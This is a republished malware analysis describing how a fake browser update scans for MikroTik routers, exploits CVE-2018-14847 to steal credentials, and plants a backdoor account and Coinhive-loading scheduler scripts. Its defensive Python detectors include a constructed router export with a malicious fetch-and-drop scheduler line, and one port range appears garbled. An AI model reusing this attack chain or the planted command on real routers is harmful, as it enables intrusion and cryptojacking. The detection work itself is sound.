How fake browser updates are used to infiltrate MikroTik routers

2025-02-23 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

This article is about how fake browser updates are used to infiltrate MikroTik routers. I think it is very practical, so I am sharing it with you; I hope you get something out of it. Let's take a look.

SpiderLabs researchers earlier discovered what may be the largest malicious Coinhive campaign, run through compromised MikroTik devices, and the problem has since grown broader. In the latest attack, the attackers use fake browser-update pages as bait. When the victim runs the malicious "update", it unpacks code onto the computer that scans the Internet for other vulnerable routers and tries to exploit them.

Suspicious browser updates

Security researcher @VriesHd first spotted this attempt to use social engineering to compromise vulnerable routers. Compromised MikroTik routers operated by network providers redirect end users whose browsers appear to be outdated versions to a fake update page.

According to a Censys search, a total of 11,000 compromised MikroTik devices were serving the fake download page.

The fake browser update is downloaded from an FTP server, as the captured request in the original report shows.

Interestingly, the same IP address is also listed as a free, open web proxy.

Payload analysis

Behavior analysis

The payload disguises itself as an installer named upd_browser.

When run, it pops up an error dialog.

However, capturing the network traffic shows many connection attempts to different IP addresses on port 8291, the default port for managing MikroTik routers with the Winbox application.

Unpacking

The dropped payload is a relatively large executable (7.25 MB). Its section headers and a visualization of its sections are shown in the original report.

The section names show that it is packed with a simple packer: UPX. The visualization of the sections indicates that a large amount of content is extracted at run time. On closer inspection, the researchers found that it unpacks a Python DLL and related files into the %TEMP% folder and then loads them. It is easy to guess that the executable is actually a Python script bundled into an .exe.

The entry-point script is named upd_browser. Decompiling it shows that the core of the malware consists of two Python scripts: upd_browser.py and ups.py.

Script analysis

The main function of this module is very simple.

As we can see, the error pop-up is hard-coded; it does not report any real error and serves only as bait. The malware records the victim's IP address by querying a hard-coded tracker URL created with the legitimate service IP Logger. The tracker takes the form of a one-pixel image.

That address is then queried repeatedly at a defined interval. The most important work is done in a function called "scan", which runs in many parallel threads (the maximum number of threads is defined as thmax = 600). The function generates pseudo-random IP addresses and tries to connect to each of them on port 8291. When a connection attempt succeeds, it tries a second connection, this time on a random port in the range 56778, 5688 (as given in the analysis). When that second connection fails, exploitation proceeds: the function poc is meant to infect the router through a known vulnerability. It first tries to obtain credentials using the path traversal vulnerability CVE-2018-14847 to read the user.dat file. That file is in the M2 format, so the script ships with a built-in parser (function load_file).
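As an added example (not code from the original analysis and not the malware's own code), the following Python script implements the defender's side of what the traffic capture above reveals: it flags a host that attempts TCP/8291 connections to many unrelated destinations in a short window, the signature of a pseudo-random Internet sweep, while leaving alone an administrator who manages a handful of routers on one subnet. The flow records, host addresses and thresholds are constructed assumptions.

```python
from collections import defaultdict
from ipaddress import ip_network

WINBOX_PORT = 8291  # default Winbox management port on MikroTik RouterOS


def _scanner_targets():
    # Constructed: 25 pseudo-random, unrelated destinations, each in a different /24
    return [f"{(17 * i) % 200 + 10}.{(53 * i) % 250}.{(29 * i) % 250}.{(7 * i) % 250 + 1}"
            for i in range(25)]


# Constructed sample flow records, not a real capture:
# (timestamp in seconds, source IP, destination IP, destination port)
SAMPLE_FLOWS = (
    # the infected workstation sweeping the Internet for Winbox (assumed host 10.0.0.5)
    [(1000 + i, "10.0.0.5", dst, WINBOX_PORT) for i, dst in enumerate(_scanner_targets())]
    # its follow-up probe on another port is not what the detector keys on
    + [(1026, "10.0.0.5", _scanner_targets()[3], 56778)]
    # an administrator managing three routers on one management subnet (assumed host 10.0.0.9)
    + [(2000, "10.0.0.9", "192.168.88.1", WINBOX_PORT),
       (2005, "10.0.0.9", "192.168.88.2", WINBOX_PORT),
       (2010, "10.0.0.9", "192.168.88.3", WINBOX_PORT)]
    # unrelated web traffic
    + [(3000, "10.0.0.7", "93.184.216.34", 443)]
)


def winbox_scan_sources(flows, window=60, min_distinct_dst=20, min_distinct_24=10):
    """Return {src: stats} for sources whose TCP/8291 attempts within any
    `window`-second span reach at least `min_distinct_dst` distinct hosts spread
    over at least `min_distinct_24` distinct /24 networks.

    The thresholds are assumptions chosen to separate a pseudo-random sweep of
    the Internet from an administrator touching a few routers."""
    per_src = defaultdict(list)
    for ts, src, dst, dport in flows:
        if dport == WINBOX_PORT:
            per_src[src].append((ts, dst))

    hits = {}
    for src, events in per_src.items():
        events.sort()
        # slide a window over this source's 8291 attempts, in time order
        for start in range(len(events)):
            t0 = events[start][0]
            dsts, nets = set(), set()
            for ts, dst in events[start:]:
                if ts - t0 >= window:
                    break
                dsts.add(dst)
                nets.add(ip_network(f"{dst}/24", strict=False))
            if len(dsts) >= min_distinct_dst and len(nets) >= min_distinct_24:
                hits[src] = {"window_start": t0,
                             "distinct_dst": len(dsts),
                             "distinct_24": len(nets)}
                break  # one alert per source is enough
    return hits


if __name__ == "__main__":
    for src, stats in winbox_scan_sources(SAMPLE_FLOWS).items():
        print(f"{src}: Winbox sweep, {stats['distinct_dst']} hosts in "
              f"{stats['distinct_24']} /24 networks, starting at t={stats['window_start']}")
```

The /24 spread is the part worth keeping: a sweep driven by pseudo-random addresses touches a new network with nearly every attempt, whereas legitimate Winbox use clusters on a few management subnets, so a destination count alone produces false positives on large fleets.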

If it manages to retrieve the credentials from user.dat, it decrypts them and uses them to create a backdoor: an account with a randomly generated password. It also adds scheduled tasks to the router. The scripts installed in the scheduler are generated from hard-coded templates (a cleaned version is given in the original report). Their job is to manipulate the router's settings and install an error page that loads the Coinhive miner. The error page can be placed in one of two locations: "webproxy/error.html" or "flash/webproxy/error.html".

Normally such a page is shown to a user who tries to view a denied URL. However, the malicious configuration set on the router makes plain HTTP requests trigger the error page. The fake error page is sneaky: it hijacks the original request and displays the requested page inside an iframe, so users do not notice the change while browsing most websites. An example is shown in the original report.
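On the router side, the persistence described in the two paragraphs above (an extra full-rights user, a scheduler task that installs the error page, the web proxy switched on) can be checked from a RouterOS /export listing. The following Python script is an added example, not MikroTik's or the researchers' code. The export sample is constructed to follow the layout of RouterOS exports (a section line such as /system scheduler followed by add/set lines, with long lines wrapped on a trailing backslash); the indicator strings, the example addresses and the expected-user list are assumptions.

```python
import re

# Constructed sample of a RouterOS "/export" listing. Addresses, names and
# the fetch URL are made up for illustration.
SAMPLE_EXPORT = """\
# feb/23/2025 10:00:00 by RouterOS 6.42.1
# software id = ABCD-1234
#
/ip proxy
set enabled=yes port=8080
/system scheduler
add interval=1d name=backup on-event="/system backup save name=daily" \\
    start-time=startup
add interval=5m name=upd120 on-event="/tool fetch url=http://198.51.100.10/e.html \\
    mode=http dst-path=webproxy/error.html" start-time=startup
/user
add name=admin group=full
add name=svc7f3a group=full
"""

# key=value pairs; values are either a double-quoted string (with \" escapes)
# or a run of non-whitespace characters
KV_RE = re.compile(r'([\w-]+)=("(?:[^"\\]|\\.)*"|\S+)')


def _unquote(value):
    if len(value) >= 2 and value[0] == '"' and value[-1] == '"':
        return value[1:-1].replace('\\"', '"').replace('\\\\', '\\')
    return value


def parse_export(text):
    """Parse an export listing into a list of (section, verb, {key: value})."""
    entries, section, buf = [], None, ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.endswith("\\"):          # wrapped line: keep the part before the backslash
            buf += line[:-1]
            continue
        line, buf = buf + line, ""
        if line.startswith("/"):          # section header, e.g. "/system scheduler"
            section = line
            continue
        verb, _, rest = line.partition(" ")
        entries.append((section, verb, {k: _unquote(v) for k, v in KV_RE.findall(rest)}))
    return entries


def audit(entries, expected_users=("admin",)):
    """Return (indicator, detail) findings matching the persistence described above.
    The indicator strings are assumptions based on the report's description."""
    findings = []
    for section, verb, kv in entries:
        if section == "/user" and verb == "add" and kv.get("name") not in expected_users:
            findings.append(("unexpected-user", kv.get("name")))
        if section == "/system scheduler" and verb == "add":
            script = kv.get("on-event", "")
            if "error.html" in script or "/tool fetch" in script:
                findings.append(("suspicious-scheduler", kv.get("name")))
        if section == "/ip proxy" and verb == "set" and kv.get("enabled") == "yes":
            findings.append(("web-proxy-enabled", kv.get("port")))
    return findings


if __name__ == "__main__":
    for indicator, detail in audit(parse_export(SAMPLE_EXPORT)):
        print(f"{indicator}: {detail}")
```

A clean export still leaves the file system unchecked: the dropped error page itself lives under webproxy/ or flash/webproxy/ and has to be looked for on the device, not in the configuration.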

Mitigation measures

MikroTik users should patch and upgrade their routers promptly; the MikroTik download page explains how to upgrade RouterOS. It is important to realize that these vulnerabilities exist and are easy to exploit, because patching a router is not something many people are used to doing. In many cases, moreover, users cannot do it themselves unless their Internet service provider performs the upgrade upstream for them. With this social-engineering tool we see how criminals try to infect ordinary users and use their computers to scan the Internet for vulnerable routers. The technique is clever because it borrows the time and resources it needs from its victims. Malwarebytes business customers and premium consumer users are protected from this threat, because the Malwarebytes anti-malware engine detects and blocks the fake browser update in real time.

The above is how fake browser updates are used to infiltrate MikroTik routers. The editor believes it contains some points we may encounter or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.
